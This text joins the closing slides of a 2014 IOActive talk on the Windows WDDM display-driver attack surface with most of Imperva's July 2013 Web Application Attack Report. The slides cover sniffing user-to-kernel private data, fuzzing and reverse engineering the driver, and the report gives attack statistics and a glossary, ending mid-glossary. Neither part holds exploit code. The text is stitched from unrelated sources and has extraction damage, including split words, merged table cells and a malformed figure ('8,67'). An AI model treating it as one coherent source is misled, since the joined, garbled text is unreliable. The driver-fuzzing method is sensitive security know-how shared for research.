WDDM kmd Driver Entrypoints – Allocation • Private driver data is captured from user to kernel. • There are NumAllocations DXGK_ALLOCATIONINFO structures that userland gets to pass.  • DXGK_ALLOCATIONINFO’s private driver data is also captured from user to kernel. • DxgkDdiOpenAllocation can’t be directly called from userland, but its private driver data is the same as provided here. 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Allocation • How do you talk to this from userland ? NTSTATUS APIENTRY D3DKMTCreateAllocation(   D3DKMT_CREATEALLOCATION *pData ); typedef struct _D3DKMT_CREATEALLOCATION {   D3DKMT_HANDLE                hDevice;   D3DKMT_HANDLE                hResource;   D3DKMT_HANDLE                hGlobalShare;   const VOID                   *pPrivateRuntimeData;   UINT                         PrivateRuntimeDataSize;   const VOID                   *pPrivateDriverData;   UINT                         PrivateDriverDataSize;   UINT                         NumAllocations; D3DDDI_ALLOCATIONINFO  *pAllocationInfo; D3DKMT_CREATEALLOCATIONFLAGS Flags;   HANDLE                       hPrivateRuntimeResourceHandle; } D3DKMT_CREATEALLOCATION; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Allocation 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – queryadapter • The actual type nr in user and driver different  • Dxgkernel does some kind of translation  • All have well defined format • With well defined length  • Except for DXGKQAITYPE_UMDRIVERPRIVATE  • Driver can implement that one any way it wants  typedef enum _DXGK_QUERYADAPTERINFOTYPE {    DXGKQAITYPE_UMDRIVERPRIVATE           = 0,   DXGKQAITYPE_DRIVERCAPS                = 1,   DXGKQAITYPE_QUERYSEGMENT              = 2, #if (DXGKDDI_INTERFACE_VERSION >= DXGKDDI_INTERFACE_VERSION_WIN7)   DXGKQAITYPE_ALLOCATIONGROUP           = 3,   DXGKQAITYPE_QUERYSEGMENT2             = 4, #endif  #if (DXGKDDI_INTERFACE_VERSION >= DXGKDDI_INTERFACE_VERSION_WIN8)   DXGKQAITYPE_QUERYSEGMENT3             = 5,   DXGKQAITYPE_NUMPOWERCOMPONENTS        = 6,   DXGKQAITYPE_POWERCOMPONENTINFO        = 7,   DXGKQAITYPE_PREFERREDGPUNODE          = 8, #endif  #if (DXGKDDI_INTERFACE_VERSION >= DXGKDDI_INTERFACE_VERSION_WDDM1_3)   DXGKQAITYPE_POWERCOMPONENTPSTATEINFO  = 9,   DXGKQAITYPE_HISTORYBUFFERPRECISION    = 10  #endif } DXGK_QUERYADAPTERINFOTYPE; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – queryadapter • What does DxgkDdiQueryAdapterInfo look like? NTSTATUS APIENTRY DxgkDdiQueryAdapterInfo(   HANDLE hAdapter,  DXGKARG_QUERYADAPTERINFO *pQueryAdapterInfo )  { ... } typedef struct _DXGKARG_QUERYADAPTERINFO {  DXGK_QUERY ADAPTERINFOTYPE T ype;  VOID                      *pInputData;   UINT                      InputDataSize;  VOID                      *pOutputData;  UINT                      OutputDataSize;  } DXGKARG_QUERYADAPTERINFO; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – queryadapter • Has interesting entry- and exit points  • Entry points:  – Data being passed in from userland.  – Most interesting type for this is  DXGKQAITYPE_UMDRIVERPRIVATE.  • Exit points:  – With Query APIs that return large structures from kernel to user, there is the risk of information leaks.  • Usually happens when a struct is on the stack/heap, no memset is done, and part of one or more members is not initialized (e.g. fixed character buffer that holds a 0-terminated string). 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – queryadapter • How do you talk to this from userland ? NTSTATUS D3DKMTQueryAdapterInfo( D3DKMT_QUERYADAPTERINFO *pData ); typedef struct _D3DKMT_QUERYADAPTERINFO {   D3DKMT_HANDLE           hAdapter;   KMTQUERYADAPTERINFOTYPE Type;   VOID                    *pPrivateDriverData;   UINT                    PrivateDriverDataSize; } D3DKMT_QUERYADAPTERINFO; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – queryadapter 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver Entrypoints – Best Practices • Out of bound read  very common – This means bluescreen in kernel  – Could happen, even for a single byte out of bound read • Don’t ship debug code  – Remove DbgPrint calls  – And surrounding code (e.g. data that will be printed by formatstring) • Ends up in binary otherwise. Could contain exploitable bugs. – #ifdef debug • Use kernel safe integer library routines (e.g. RtlUIntAdd)  – Please don’t roll your own ... 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Full userland Program to Talk to this Stuff  • Slightly more difficult than it looks.  • The APIs are documented on msdn, and exported from gdi32.dll. • The data structures are documented on msdn.  • Meant for OpenGL ICD (Installable client driver) drivers – No headers for this stuff:  • Need to LoadLibrary/GetProcAddress • There is a devkit for this, but, ..., MSDN says: “Note To obtain a license for the OpenGL ICD Development Kit, contact the OpenGL Issues team.”  • Given that it is documented, getting a (partially) working implementation is pretty easy.  • Or you could use the COM APIs.   
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Sniffing/snooping Private Data • Since data send from umd to kmd is not structured in any way, we need to see what gets sent to kmd under normal conditions.  • To get an idea of what the protocol looks like for any given driver • Hook APIs: – D3DKMTEscape – D3DKMTRender – D3DKMTCreateAllocation – D3DKMTQueryAdapterInfo 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Sniffing/snooping Private Data • Tool/demo • Release! • Running against PowerPoint seems to give pretty good results. 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Putting It all Together • Fuzzing  • Reverse engineering  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Putting It all Together – Fuzzing • Mutating fuzzer  • Starting off with sniffed data (template per driver) • Mutate data  • Loop  • Combine this with reversing  – If (embedded_len != PrivateDataSize) bail; – Checksums  •  Bugs! 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Putting It all Together – Reverse Engineering "If the process of reverse engineering Windows drivers could be modeled as a discrete task, 90% would be understanding how Windows works and 10% would be understanding assembly code.“ – Bruce Dang 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • As shown before, all the driver does as part of its initialization is call DxgkInitialize() or DxgkInitializeDisplayOnlyDriver().  • And pass it a callback table (DRIVER_INITIALIZATION_DATA) • When looking at the driver in a disassembler no call to these functions is observed.  • These functions are inlined  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering  • So what does it look like? (with symbols) 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • Loads Dxgkrnl.sys (it should already be loaded)  • Gets a pointer to its device object  • Issues ioctl 0x230043 on it (video device, function 10, method neither, FILE_ANY_ACCESS) • Hands back a function pointer to be used to register the callback  • Call that function pointer with DRIVER_INITIALIZATION_DATA or PKMDDOD_INITIALIZATION_DATA struct as argument  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • The table itself can be created/stored several different ways  – tabled stored globally – Created on the stack  – Specific function fills in DRIVER_INITIALIZATION_DATA • Or filled out in a local stack buffer right before calling DxgkInitialize() • Finding the code that does this is usually pretty simple. It’ll happen early on, usually in DriverEntry() or some function it calls.  • Tends to look like this:  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering 

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • Here’s what the structure looks like in C:  • Mapping this to IDA disassembly and renaming the functions to something meaningful is pretty easy  typedef struct _DRIVER_INITIALIZATION_DATA {   ULONG                                                   Version;   PDXGKDDI_ADD_DEVICE                                     DxgkDdiAddDevice;   PDXGKDDI_START_DEVICE                                   DxgkDdiStartDevice;   PDXGKDDI_STOP_DEVICE                                    DxgkDdiStopDevice;   PDXGKDDI_REMOVE_DEVICE                                  DxgkDdiRemoveDevice; ... } DRIVER_INITIALIZATION_DATA, *PDRIVER_INITIALIZATION_DATA; 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • Userland data passed in (PrivateData) – Driver gets to handle this any way it sees fit – Usually:  • Feels like (simple) network protocol reverse engineering • Usually comes with a header – Type   – Length  – Value • Switch case or nested if/else to handle values for types 
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • Example of a typical case:  

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
WDDM kmd Driver – Reverse Engineering • Functions (e.g. DxgkDdiEscape) tend to return STATUS_INVALID_PARAMETER (0xc000000d) when userland provided data couldn’t be parsed  – Return value gets picked by driver – If you see this often/constantly during fuzzing, it’s usually a sign you’ve hit some kind of validation/checksum.  • Dig into assembly to figure out why, and adjust your fuzzer accordingly.  

IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Summary • WDDM around since vista  • Several interesting trust boundaries and entry points  – Escape  – Render  – allocation – queryadapter • Most attacker controlled data send from umd <-> kmd not standarized (e.g. no IRP’s)  •  see similar bugs compared to other drivers  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Conclusion • pretty much untouched attack surface • There’s work to be done here  
IOActive, Inc. Copyright ©2014.  All Rights Reserved. 
Q&A White PaperImperva  
Web Application  
Attack Report
Edition #4 – July 2013
2
Imperva Web Application Attack ReportThis document contains proprietary material of Imperva. Any unauthorized reproduction or use of this material, or any part 
thereof, is strictly prohibited.Table of Contents
1 Abstract 3
2 Executive Summary 4
3 Analysis Methodology 6
3.1 Data Corpus 6
3.2 Updates in Data Analysis and Presentation Methodology 6
3.3 Analysis Glossary 6
4 Analysis Results 7
4.1 Overview 7
4.2 Comparative Attack Overview 7
4.2.1 Number of Attack Incidents 8
4.2.2 Attack Incident Magnitude 8
4.2.3 Attack Incident Duration 9
4.2.4 Battle Days 10
4.2.5 Requests per Battle Day 11
4.3 Worst Case Scenarios 12
4.4 Comparing Vertical Industries 12
4.5 Geographic Dispersion 13
5 Conclusions and Recommendations 15
6 Attack Glossary 16
6.1 SQL Injection 16
6.2 Remote File Inclusion 16
6.3 Local File Inclusion 16
6.4 Directory Traversal 16
6.5 Cross-Site Scripting 16
6.6 Email Extraction 16
6.7 Comment Spamming 16
3
Imperva Web Application Attack Report1 Abstract
The application threat landscape can be described as a cyber war. In this report, we explore the technical details of this war – 
the methods, intensity, and duration of attacks witnessed in cyber battlefields across the globe. Armed with this report, security 
officers can understand the threats they face and prepare for future attacks.
This Web Application Attack Report (WAAR) identifies how many attacks a typical application can expect to suffer annually. In 
addition, it exposes which countries perpetrated the most attacks and compares application risks by industry. Most importantly, 
this report reveals the underlying distribution of attacks, presenting an accurate picture of today’s application threat landscape.
Key findings:
› Retailers suffer 2x as many SQL injection attacks as other industries.
› While most web applications receive 4 or more web attack campaigns per month, some websites are constantly under attack.
• One observed website was under attack 176 out of 180 days, or 98% of the time.
› Imperva observed a single website receive 94,057 SQL injection attack requests in one day.
• 94,057 equates to 1,567 SQL injection attacks per hour or 26 attack requests per minute, on average
› The United States retains its rank as the number one source of web attacks.
4
Imperva Web Application Attack Report2 Executive Summary
Our key web application attack statistics are summarized in Table 1.
Table 1 – Key Statistics Summary
 Median Maximum
Application battle days during a six month period 12 176
Attack incident duration (in minutes) 5 935
While most applications suffered high-severity attacks for 12 days during a 6-month period, or once every 15 days, the duration 
and the number of attack campaigns varied widely, with some web applications under attack virtually every day. Each attack 
incident could consist of hundreds or even thousands of individual attack requests.
Table 2 – Comparison of Key Statistics to WAAR 3
 WAAR 4 July 2013 WAAR 3 July 2012
 Median Maximum Median Maximum
Number of attack incidents per application during a six month period 25 3,006 137 1,383
Number of individual attacks per incident 85 148,089 195 359,390
When compared to Imperva’s previous WAAR report, published in July 2012, the maximum number of attack incidents grew, while 
the median number of attack incidents and the intensity of the attacks lessened year over year. This decrease can be attributed 
to the addition of more applications to our data corpus; specifically, applications with smaller traffic volumes. The results are 
summarized here and discussed in depth in Section 5 of this report.
The growth of our data corpus enabled us to investigate and compare attack patterns within different vertical industries.
Figure 1– Relative Portions of Each Attack Type in Retail Web Applications vs. Other Web Applications 
Figure 1 illustrates the types of web attacks targeting retail web applications compared to attacks targeting other industries.  
When compared to other industries, retail applications suffered twice as many SQL injection attacks, but fewer Remote File 
Inclusion (RFI) attacks.
Following these results, we further investigated the characteristics of SQL injection attacks.
5
Imperva Web Application Attack ReportOur analysis, shown in Table 3, revealed that SQL injection attacks on retail applications were more intense, both in terms of 
number of attacks per incident and duration of an incident. In fact, retail applications received 749 individual attack requests per 
attack campaign.
Table 3 – Analysis of Magnitude and Duration of SQL Injection Attack Incidents
 Magnitude per Incident (Requests) Duration per Incident (Minutes)
 Average Maximum Average Maximum
Retail 749 46,027 22 575
Other Industries 298 7,700 12 260
The geographic attack trends reported in the previous WAAR remain relevant, with the majority of requests and attackers 
originating in the United States, Western European countries, China, and Brazil. For business logic attacks, email extraction is still 
widely dominated by African countries, such as Senegal, Nigeria, Ghana, and the Ivory Coast. The field of comment spamming 
shows an unusual proportion toward Eastern European countries, such as Russia, Ukraine, Latvia, and Poland. Besides this 
geographic dominance, more and more business logic attacks are originating from Asia and South America. Countries generating 
an increasing number of business logic attacks include Malaysia, Thailand, Pakistan, Mexico, Brazil, and Argentina.
6
Imperva Web Application Attack Report3 Analysis Methodology
3.1 Data Corpus
This security summary report is based on observing and analyzing Internet traffic to 70 web applications during a period of six 
months.  Compared to the 2012 WAAR, the number of analyzed applications doubled.
We identified security attacks targeting these applications, categorized them according to the attack method, and identified 
patterns and trends within these attacks.
Automated tools monitored and recorded web application traffic. Security event logs were analyzed using Imperva’s special-
purpose software and knowledgebase. This analysis used several measures, including matching events to known attack signatures, 
comparing attack sources to black lists of malicious hosts, and reviewing specific attributes of malicious traffic. Imperva’s security 
experts performed additional detailed analysis of important events and patterns.
3.2 Updates in Data Analysis and Presentation Methodology
The analysis and presentation methodology in this report follows the changes we applied starting with our July 2012 WAAR.1
Similar to our last report, we defined an attack incident to consist of at least 30 requests in five minutes (on average, one attack 
request every 10 seconds). Of course, a single attack may span several consecutive five-minute periods. We also defined an even 
broader concept of “battle days.” Battle days are days in which at least a single attack incident targeted an application.
Attacks against a web application can be measured according to several criteria, all of which have very practical security implications:
› How many attack campaigns occur in a given period of time?
› How long does each attack last?
› How intense is an attack campaign; that is, how many HTTP requests are issued as part of the attack?
› How many “battle days” should a company expect during the next six to twelve months?
› If a company suffered an attack incident yesterday, how likely will they suffer an attack today?
We used statistical analysis to answer these questions. However, statistics can be misleading. Benefiting from the experience 
of preparing previous WAARs, we concluded that we need more insightful statistical analysis of our data. Web attacks have 
asymmetric distributions, with rare but significant outliers. A security manager who prepares for an “average” number of attacks 
or a typical attack duration will be unprepared for an intense attack. Therefore, starting with WAAR 3, we use relevant descriptive 
statistics like the median and quartiles, rather than averages and standard deviation. Graphically, we present the resulting numbers 
using box-and-whisker plots. For a more thorough discussion, see the Methodology section in WAAR 32.
After analyzing six months of application attacks, we uncovered some results that reinforced existing trends and statistics and 
other results that deviated dramatically from previous reports. Based on our examination of web attack methods, attack sources, 
and incident intensity and duration, organizations’ security teams can prioritize their efforts and develop plans to improve their 
security posture.
3.3 Analysis Glossary
› Attack request  – A single, malicious HTTP request.
› Attack incident  – Attacks are burst-like in nature. Each burst that exceeded the rate of 30 attack requests per a five minute 
period was defined as an attack incident.
› Attack incident magnitude  – The number of attack requests per attack incident.
› Attack incident duration  – The length, in minutes, of an attack incident.
› Battle day  – A day in which an application experienced at least one attack incident.
1 http://www.imperva.com/docs/HII_Web_Application_Attack_Report_Ed3.pdf
2 http://www.imperva.com/docs/HII_Web_Application_Attack_Report_Ed3.pdf
7
Imperva Web Application Attack Report4 Analysis Results
4.1 Overview
Our key statistics on web application attacks are summarized in Table 4. The statistics are summarized for all tested applications 
and for all attack types.
Table 4 – Key Statistics Summary
 Median Maximum
Application battle days during a 6-month period 12 176
Attack incident duration (in minutes) 5 935
A typical application experienced 12 battle days, that is, days in which at least one attack incident occurred. In comparison, the 
worst case was 176 battle days in six months, meaning one of the tested applications suffered attack incidents in almost each and 
every day within this time period. Another interesting finding was that while the typical attack incident lasted around five minutes, 
the worst case incident was about 100 times longer, lasting more than 15 hours.
Table 5 – Comparison of Key Statics to WAAR 3
 WAAR 4 July 2013 WAAR 3 July 2012
 Median Maximum Median Maximum
Number of attack incidents per application during a six month period 25 3,006 137 1,383
Number of individual attacks per incident 85 148,089 195 359,390
Comparing the results of this report to those of the July 2012 WAAR, the maximal values, or worst cases, are in the same order of 
magnitude. The maximal number of battle days a single application suffered was higher, as was the number of attack incidents. 
Moreover, the application that suffered the maximal amount of attack incidents and battle days remained the same application. 
This suggests stability in the attack patterns of a single application, as well as in traffic volume.
 In contrast, the maximal attack magnitude and attack duration are smaller in this report than in the previous analysis. The typical 
values in our data represent the changes in the web applications that compose our data corpus, and not an actual decrease in 
attack occurrence.
When this analysis is compared to that of the previous WAAR, despite the addition of new applications, some of the applications 
with the highest attack incident numbers remained the same as in the previous period. In other words, some applications are 
attacked more than others, and these remain stable over time.
4.2 Comparative Attack Overview
In this section, we summarize the characteristics of each attack type across the monitored applications. In the previous report, only 
applications that suffered a substantial volume of attacks were included in our analyses (more than 1,000 malicious HTTP requests 
in six months). In this report, we decided to include all monitored applications in the analysis. This change might be responsible in 
part for the decrease in the calculated median values of attack incidents and their magnitude, as applications with very little traffic 
were also taken into account. We believe that this provides us with a more accurate picture.
The relatively low number of business logic attack incidents identified in this report can be attributed to the nature of the attacks, 
which often don’t require high rate bursts. Therefore it may be that such traffic didn’t exceed our threshold for defining an attack 
incident. In future research, it might be beneficial to treat business logic attacks with different criteria, e.g., lower thresholds, slower 
rates, etc. It is also important to keep in mind that business logic attacks strongly depend on the nature of the application itself, and 
are more likely to occur in applications with a lot of user-provided content, such as social networks, forums, and blogs.
8
Imperva Web Application Attack Report4.2.1 Number of Attack Incidents
Table 6 – Number of Attack Incidents
Attack Incidents During 6-Month Period
 SQL 
InjectionRemote File 
InclusionLocal File 
InclusionDirectory 
TraversalCross-Site 
ScriptingHTTP 
ViolationsEmail 
ExtrusionComment 
Spam
Median 10 3 1 7 7 11 3 2
Maximum 209 98 8 193 85 2898 81 13
1st Quartile 4 3 1 3 2 2 2 2
3rd Quartile 30 10 3 24 14 43 6 6
Figure 2 – Number of Attack Incidents
Figure 2 illustrates the maximum number of attack incidents identified per application during a 6-month period, as well as the 
median number of attacks (the middle line in the box) and the first and third quartile figures (the bottom and top lines of each box, 
respectively). The most prevalent types of attacks are SQL injection, and directory traversal HTTP protocol violations, which often 
indicate automated threats, evasion techniques, and denial of service attacks.
4.2.2 Attack Incident Magnitude
Table 7 – Magnitude of Attack Incidents
Attack Requests Per Incident
 SQL 
InjectionRemote File 
InclusionLocal File 
InclusionDirectory 
TraversalCross-Site 
ScriptingHTTP 
ViolationsEmail 
ExtrusionComment 
Spam
Median 98 42 49 75 80 87 72 224
Maximum 46,027 2,472 867 11,756 19,324 148,089 4,860 36,390
1st Quartile 48 35 35 39 40 50 53 68
3rd Quartile 212 76 158 200 278 178 264 232
In the previous report, we calculated the average number of requests per attack incident for each application, and then performed 
statistical analyses of the averages. For this report, we describe the distribution of all attack incidents, regardless of the application 
in which they had occurred, which we believe provides a more thorough assessment.
9
Imperva Web Application Attack ReportFigure 3 – Magnitude of Attack Incidents
4.2.3 Attack Incident Duration
Table 8 – Duration of Attack Incidents
Attack Duration in Minutes per Incident
 SQL 
InjectionRemote File 
InclusionLocal File 
InclusionDirectory 
TraversalCross-Site 
ScriptingHTTP 
ViolationsEmail 
ExtrusionComment 
Spam
Median 5 5 5 5 5 5 5 5
Maximum 575 135 20 360 195 575 50 935
1st Quartile 6 5 5 5 5 5 5 5
3rd Quartile 11 5 5 15 15 10 10 10
In Table 8, it is evident that attacks are usually a burst event, with the medians number of attack incidents lasting between 5 to 10 
minutes. As the maximal values show, there certainly are longer attacks lasting several hours, but most attacks are well below 15 
minutes.
Figure 4 – Duration of Attack Incidents

10
Imperva Web Application Attack ReportFor Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks, the distribution of attack duration is so narrow that more than 
75% of the attack incidents lasted five minutes or less. These categories don’t have a proper “box” in Figure 4, since the first and 
third quartiles have the same value. For the other attack types, the median is also five minutes, which is our minimal value for 
calculation. Thus, the distribution is skewed towards the bottom.
4.2.4 Battle Days
Table 9 and Figure 5, together, show the number of days over a 6-month period which an application suffered an attack incident.
Table 9 – Battle Days per Six Months
Battle Days During a 6-Month Period
 SQL 
InjectionRemote File 
InclusionLocal File 
InclusionDirectory 
TraversalCross-Site 
ScriptingHTTP 
ViolationsEmail 
ExtrusionComment 
Spam
Median 7 2 1 4 3 5 3 1
Maximum 96 49 3 69 14 176 53 2
1st Quartile 3 2 1 2 2 2 2 1
3rd Quartile 15 8 3 11 6 19 4 2
Figure 5 – Battle Days per Six Months

11
Imperva Web Application Attack Report4.2.5 Requests per Battle Day
Table 10 and Figure 6 portray the number of malicious HTTP requests sent to an application during a single battle day.
Table 10 – Attacks per Battle Day
Attack Requests Battle Day
 SQL 
InjectionRemote File 
InclusionLocal File 
InclusionDirectory 
TraversalCross-Site 
ScriptingHTTP 
ViolationsEmail 
ExtrusionComment 
Spam
Median 144 48 47 94 210 189 110 415
Maximum 94,057 4,255 1,366 22,013 19,977 344,059 5,703 37,473
1st Quartile 69 35 37 43 80 61 55 93
3rd Quartile 349 110 89 385 629 1715 383 1810
Figure 6 – Attack Requests per Battle Day

12
Imperva Web Application Attack Report4.3 Worst Case Scenarios
Table 11 summarizes the maximal values observed for each attack type. The maximal values in the table represent the largest 
attack observed in the entire dataset; that is, “the worst case scenario” of our data.
Table 11 – Worst Case Scenarios, Maximal Observed Values
 SQL 
InjectionRemote File 
InclusionLocal File 
InclusionDirectory 
TraversalCross-Site 
Scripting
Maximum Attacks per Incident 46,027 2,472 8,67 11,756 19,324
Attack Rate (Attacks per Minute) 185 124 173 191 201
Maximum Attacks per Battle Day 94,057 4,255 1,366 22,013 19,977
4.4 Comparing Vertical Industries
The growth of our data corpus enabled us to investigate and compare attack patterns within different vertical industries. Not all 
applications are the same, and different industries tend to have different characteristics and attract different attackers. A recent 
study by Whitehat Security3 revealed that websites from the retail industry have more security vulnerabilities than any of the other 
11 tested industries, including banking, financial services, healthcare, energy, and education. Since they often process credit card 
data and they contain more serious vulnerabilities than other industries, retail applications are the perfect targets for cyber-attacks.
Our data provides an opportunity to look at differences between industries from another angle. While Whitehat statistics are 
based on vulnerabilities found, but not necessarily exploited, our data represents actual exploitation attempts – regardless of the 
existence of the vulnerability in the targeted web application.
Figure 7 illustrates the differences in the relative portions of attack types in retail web applications versus applications of other 
industries. When compared to other industries, retail applications suffered twice as many SQL injection attacks. They received 
fewer Directory Traversal and Cross-site Scripting (XSS) attacks, and the portion of RFI attacks is dramatically lower: 1% of attacks in 
retail applications, compared to 14% of attacks in other tested applications.
It is also interesting to note that although still small, the relative amount of Comment Spam activity in retail applications is twice 
as high as other industries’ figures. This can be attributed to the nature of retail websites, which often provide room for user 
comments, product reviews, recommendations, and complaints.
Figure 7 – Relative Portions of Each Attack Type in Retail Web Applications vs. Other Applications
3 https://www.whitehatsec.com/resource/stats.html
13
Imperva Web Application Attack ReportFollowing these results, we further investigated the characteristics of SQL injection attacks. We compared the distribution of SQL 
injection attack incidents on retail applications to other applications, with regard to attack magnitude and duration. Our analysis 
revealed that SQL injection attacks on retail applications consisted of more HTTP requests and lasted longer than SQL injection 
attacks on other applications. This finding can be attributed to the design and size of the applications. For example, it is plausible 
to assume that retail applications contain a relatively large number of pages in the form of online catalogs, and that this factor may 
have contributed to the length and the intensity of SQL injection attacks.
Table 12 – Analysis of Magnitude and Duration of SQL Injection Attack Incidents
 Magnitude per Incident (Requests) Duration per Incident (Minutes)
 Average Maximum Average Maximum
Retail 749 46,027 22 575
Other Industries 298 7,700 12 260
4.5 Geographic Dispersion
We have analyzed the geographic distribution of the attack initiating hosts, as determined by their IP addresses. Tables 13 and 14 
summarize the top 10 countries where the largest volume of HTTP requests initiated.
Table 13 – Countries Where Most Attack Requests Were Initiated  
(Requests in Thousands)
Remote File 
InclusionSQL InjectionDirectory 
TraversalLocal File 
InclusionEmail Extrusion Comment Spam
Country Requests Country Requests Country Requests Country Requests Country Requests Country Requests
United States 82 United States 803 United States 594 United States 20 Senegal 50 United States 42
France 22 China 46 Philippines 26 France 11 China 34 China 5
Germany 9 Netherlands 22 China 18Republic of 
Korea6United 
States32 Mexico 4
Brazil 8 Germany 17 Germany 13 Bangladesh 2 Ivory Coast 21 Turkey 4
Republic of 
Korea7 India 16 Canada 8 Brazil 2European 
Union19 Pakistan 3
United 
Kingdom6 Indonesia 12Russian 
Federation7United 
Kingdom2 Malaysia 12 Ukraine 3
Netherlands 6Russian 
Federation12 Sweden 6 Germany 1 Ukraine 10Russian 
Federation2
Turkey 6United 
Kingdom8United 
Kingdom4Russian 
Federation1 Brazil 8 Ireland 2
Sweden 6 Canada 7 Indonesia 3 Singapore 1 Germany 4European 
Union1
Russian 
Federation6 Turkey 7 France 2 Turkey 1 Ghana 4 Argentina 1
14
Imperva Web Application Attack ReportTable 14 – Countries with the Most Distinct Attacking Hosts
Remote File 
InclusionSQL InjectionDirectory 
TraversalLocal File 
InclusionEmail Extrusion Comment Spam
Country Attackers Country Attackers Country Attackers Country Attackers Country Attackers Country Attackers
United States 2893 United States 11662 United States 9366 United States 507 Senegal 2472 China 1676
Brazil 551 China 1761 China 2944 France 85 Ivory Coast 2318 United States 753
Germany 357United 
Kingdom1192Russian 
Federation930 Germany 80United 
States881Russian 
Federation434
Russian 
Federation252 Ukraine 1182 Ukraine 478Republic of 
Korea74European 
Union747 Ukraine 433
France 249 India 1153 Germany 423 Brazil 64 Ghana 489European 
Union176
United 
Kingdom240 Canada 1061 Canada 410European 
Union32 Malaysia 291 Sweden 147
Netherlands 174 Belarus 915 Mexico 391United 
Kingdom30 Thailand 286 France 117
Czech 
Republic146 Thailand 751United 
Kingdom390 Turkey 28 Egypt 197United 
Kingdom96
Republic of 
Korea139 Turkey 643 India 265 Spain 25 Nigeria 153 Poland 94
Canada 135 Mexico 481 Brazil 248Russian 
Federation19 Indonesia 142 Brazil 81
There were no significant differences in countries of origin between the retail group and the rest of the tested applications.
The geographic attack trends reported in the previous WAAR remain relevant, with the majority of requests and attackers 
originating in the United States, Western European countries, China, and Brazil. For business logic attacks, email extraction is still 
widely dominated by African countries, such as Senegal, Nigeria, Ghana, and the Ivory Coast. The field of comment spamming 
shows an unusual proportion toward Eastern European countries, such as Russia, Ukraine, Latvia, and Poland. Besides this 
geographic dominance, more and more business logic attacks are originating from Asia and South America. Countries generating 
an increasing number of business logic attacks include Malaysia, Thailand, Pakistan, Mexico, Brazil, and Argentina.
15
Imperva Web Application Attack Report5 Conclusions and Recommendations
To mitigate the attacks in this WAAR, organizations should:
› Deploy security solutions that prevent automated attacks. To stop automated attacks, security solutions should recognize 
known automated sources, differentiate between bots and human clients, and detect unusual activity, such as an extremely 
high rate of Web requests from a single user. Automated attack detection must be identified as early as possible during an 
attack incident.
› Learn from peers. Applications in similar business verticals may share similar attack characteristics. In this report, we have 
shown that online retail applications experience about twice as many SQL injection attacks, and fewer RFI attacks than the 
general application population. Moreover, the SQL injection attacks experienced by online retail applications were much 
more intensive.
› Detect and block attacks that target known vulnerabilities. The knowledgebase of exploitable weaknesses in an application 
must be frequently updated.
› Acquire intelligence on malicious sources and apply this intelligence in real time. Black lists of attack sources are still an 
efficient counter-measure. However, lists must be up-to-date to be effective.
› Participate in a security community and share threat intelligence. The increased automation and scale of attacks leave a large 
footprint that can only be seen by analyzing data gathered from a large set of potential victims.
› Attack distribution is burst-orientated and far from consistently distributed. Estimations for security measures should be 
based on the worst case scenario, not on the average case.
› Security procedures and solutions should be as automated as possible, since attack volume is too overwhelming for humans 
to monitor, and typically, there will be no advance warning of an attack.
16
Imperva Web Application Attack Report6 Attack Glossary
6.1 SQL Injection
SQL Injection (SQLi)  is an attack that exploits a security vulnerability occurring in the database layer of an application (such as 
queries). Using SQL injection, the attacker can extract or manipulate the web application’s data. The attack is viable when user 
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly 
typed, and thereby unexpectedly executed.
6.2 Remote File Inclusion
Remote File Inclusion (RFI)  is an attack that allows an attacker to include a remote file, usually through a script, on the web server. 
This attack can lead to data theft or manipulation, malicious code execution on the web server, or malicious code execution on 
the application client side, such as JavaScript execution, which can lead to other attacks. This vulnerability occurs due to the use 
of user-supplied input without proper validation. 
6.3 Local File Inclusion
Local File Inclusion (LFI)  is an attack that includes files on a server into the web server. This attack can lead to malicious code 
execution on the web server. The vulnerability occurs when an included page is not properly sanitized, and allows, for example, 
directory traversal characters to be injected. LFI attacks often append a null character to the included file path in order to bypass 
value sanitization.
6.4 Directory Traversal
Directory Traversal (DT)  is an attack that orders an application to access a file that is not intended to be accessible and expose 
its content to the attacker. The attack exploits insufficient security validation or insufficient sanitization of user-supplied input file 
names. Characters representing “traverse to parent directory” are passed through to the file APIs.
6.5 Cross-Site Scripting
Cross-Site Scripting (XSS)  is an attack that lets the attacker execute scripts in a victim’s browser to hijack user sessions and steal his 
credentials, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc. XSS flaws occur 
when an application includes user-supplied data in a page sent to the browser without properly validating or escaping that 
content.
6.6 Email Extraction
